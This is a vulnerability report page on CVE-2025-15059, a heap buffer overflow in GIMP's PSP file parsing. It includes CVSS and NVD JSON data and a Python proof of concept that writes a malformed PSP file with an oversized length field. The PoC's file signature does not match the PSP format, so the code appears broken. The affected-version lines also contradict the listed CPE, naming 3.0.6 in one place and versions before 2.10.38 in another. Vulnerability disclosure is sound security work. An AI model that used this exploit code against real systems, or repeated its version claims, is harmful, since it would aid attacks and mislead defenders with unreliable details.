Security Vulnerability Report
中文
CVE-2025-15059 CVSS 7.8 HIGH

CVE-2025-15059

Published: 2026-01-23 04:16:01
Last Modified: 2026-02-26 20:04:22
Source: [email protected]

Description

GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28232.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:gimp:gimp:3.0.6:*:*:*:*:*:*:* - VULNERABLE
GIMP < 2.10.38
GIMP 2.x series prior to 2.10.38

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-15059 PoC - GIMP PSP File Parsing Heap Buffer Overflow This is a proof-of-concept for educational purposes only. Do not use for malicious purposes. """ import struct import sys def create_malicious_psp_file(filename): """ Creates a malicious PSP file that triggers heap buffer overflow in GIMP's PSP file parser. """ # PSP file signature psp_signature = b'PSPFILE' # PSP version (106 = PSP 6) psp_version = struct.pack('<H', 106) # Creator info creator = b'\x00' * 64 # Image dimensions (width, height) width = struct.pack('<H', 800) height = struct.pack('<H', 600) # Bit depth (24-bit) bit_depth = struct.pack('<H', 24) # Compression flag (0 = none) compression = struct.pack('<H', 0) # Number of layers num_layers = struct.pack('<H', 1) # Offset to layer info (will be set later) layer_offset = struct.pack('<I', 256) # Create crafted layer data with oversized length field # This triggers the heap buffer overflow layer_header_size = 64 # Malicious length value that exceeds buffer size malicious_length = struct.pack('<I', 0x7FFFFFFF) # Oversized length # Crafted layer data layer_data = b'A' * 1024 # Padding data # Combine all parts to create malformed PSP file psp_file = ( psp_signature + psp_version + creator + width + height + bit_depth + compression + num_layers + layer_offset + malicious_length + layer_data ) with open(filename, 'wb') as f: f.write(psp_file) print(f"[+] Malicious PSP file created: {filename}") print(f"[+] File size: {len(psp_file)} bytes") print(f"[!] This file may trigger heap buffer overflow in vulnerable GIMP versions") if __name__ == '__main__': if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <output_filename.psp>") sys.exit(1) create_malicious_psp_file(sys.argv[1])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15059", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:00.740", "lastModified": "2026-02-26T20:04:21.843", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28232."}, {"lang": "es", "value": "Vulnerabilidad de ejecución remota de código por desbordamiento de búfer basado en montículo en el análisis de archivos PSP de GIMP. Esta vulnerabilidad permite a atacantes remotos ejecutar código arbitrario en instalaciones afectadas de GIMP. Se requiere interacción del usuario para explotar esta vulnerabilidad, ya que el objetivo debe visitar una página maliciosa o abrir un archivo malicioso.\n\nLa falla específica existe dentro del análisis de archivos PSP. El problema resulta de la falta de validación adecuada de la longitud de los datos proporcionados por el usuario antes de copiarlos a un búfer basado en montículo. Un atacante puede aprovechar esta vulnerabilidad para ejecutar código en el contexto del proceso actual. Fue ZDI-CAN-28232."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gimp:gimp:3.0.6:*:*:*:*:*:*:*", "matchCriteriaId": "F9B29A73-05E5-438E-B994-61FBB133B6AC"}]}]}], "references": [{"url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/03575ac8cbb0ef3103b0a15d6598475088dcc15e", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://www.zerodayinitiative.com/advisories/ZDI-25-1196/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.